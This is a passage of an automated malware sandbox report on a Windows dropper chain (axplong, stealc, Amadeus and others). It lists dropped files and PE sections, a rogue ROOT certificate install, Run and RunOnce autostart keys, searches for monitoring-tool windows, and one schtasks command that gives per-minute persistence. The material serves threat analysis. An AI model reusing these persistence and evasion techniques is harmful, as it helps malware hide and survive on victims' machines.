Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: afdpsowp
Source: axplong.exe.0.dr	Static PE information: section name: loqpciws
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: Set-up[1].exe.7.dr	Static PE information: section name: /4
Source: Set-up[1].exe.7.dr	Static PE information: section name: /14
Source: Set-up[1].exe.7.dr	Static PE information: section name: /29
Source: Set-up[1].exe.7.dr	Static PE information: section name: /41
Source: Set-up[1].exe.7.dr	Static PE information: section name: /55
Source: Set-up[1].exe.7.dr	Static PE information: section name: /67
Source: Set-up[1].exe.7.dr	Static PE information: section name: /80
Source: Set-up[1].exe.7.dr	Static PE information: section name: /91
Source: Set-up[1].exe.7.dr	Static PE information: section name: /102
Source: Set-up.exe.7.dr	Static PE information: section name: /4
Source: Set-up.exe.7.dr	Static PE information: section name: /14
Source: Set-up.exe.7.dr	Static PE information: section name: /29
Source: Set-up.exe.7.dr	Static PE information: section name: /41
Source: Set-up.exe.7.dr	Static PE information: section name: /55
Source: Set-up.exe.7.dr	Static PE information: section name: /67
Source: Set-up.exe.7.dr	Static PE information: section name: /80
Source: Set-up.exe.7.dr	Static PE information: section name: /91
Source: Set-up.exe.7.dr	Static PE information: section name: /102
Source: Setup[1].exe.7.dr	Static PE information: section name: /4
Source: Setup[1].exe.7.dr	Static PE information: section name: /14
Source: Setup[1].exe.7.dr	Static PE information: section name: /29
Source: Setup[1].exe.7.dr	Static PE information: section name: /41
Source: Setup[1].exe.7.dr	Static PE information: section name: /55
Source: Setup[1].exe.7.dr	Static PE information: section name: /67
Source: Setup[1].exe.7.dr	Static PE information: section name: /80
Source: Setup[1].exe.7.dr	Static PE information: section name: /91
Source: Setup[1].exe.7.dr	Static PE information: section name: /102
Source: Setup.exe.7.dr	Static PE information: section name: /4
Source: Setup.exe.7.dr	Static PE information: section name: /14
Source: Setup.exe.7.dr	Static PE information: section name: /29
Source: Setup.exe.7.dr	Static PE information: section name: /41
Source: Setup.exe.7.dr	Static PE information: section name: /55
Source: Setup.exe.7.dr	Static PE information: section name: /67
Source: Setup.exe.7.dr	Static PE information: section name: /80
Source: Setup.exe.7.dr	Static PE information: section name: /91
Source: Setup.exe.7.dr	Static PE information: section name: /102
Source: Amadeus[1].exe.7.dr	Static PE information: section name: .symtab
Source: Amadeus.exe.7.dr	Static PE information: section name: .symtab

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_001CD84C push ecx; ret	7_2_001CD85F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B2804D push ecx; iretd	11_2_06B28052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06B2EFB2 push eax; ret	11_2_06B2EFC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00428E7D push esi; ret	14_2_00428E86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_004076D3 push ecx; ret	14_2_004076E6
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBB4E7 push esi; retf	15_2_08CBB4EA
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBB4F7 push ebx; retf	15_2_08CBB4FA
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBB4B9 push ebx; retf	15_2_08CBB4BA
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBB500 push FFFFFF90h; retf	15_2_08CBB502
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Code function: 15_2_08CBF530 push esp; ret	15_2_08CBF531
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FAE060 push es; ret	17_2_05FAE070
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Code function: 17_2_05FAECF2 push eax; ret	17_2_05FAED01
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048D77C push ecx; ret	19_2_0048D78F
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0048DE26 push ecx; ret	19_2_0048DE39
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0063D77C push ecx; ret	20_2_0063D78F
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_009FA9F5 push ecx; ret	22_2_009FAA08
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C88B536 push ecx; ret	22_2_6C88B549

Source: file.exe	Static PE information: section name: entropy: 7.980499909171349
Source: file.exe	Static PE information: section name: afdpsowp entropy: 7.954143997411937
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.980499909171349
Source: axplong.exe.0.dr	Static PE information: section name: afdpsowp entropy: 7.954143997411937
Source: crypted[1].exe.7.dr	Static PE information: section name: .text entropy: 7.995145897290141
Source: crypted.exe.7.dr	Static PE information: section name: .text entropy: 7.995145897290141
Source: crypteda[1].exe.7.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.7.dr	Static PE information: section name: .text entropy: 7.99930616062516

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\Setup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\runtime[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\channel3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\1000238002\Amadeus.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Set-up[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce runtime
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Amadeus.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Amadeus.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Amadeus.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce runtime
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce runtime
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce runtime
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce runtime

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 19_2_0048C5C8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_0048C5C8

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
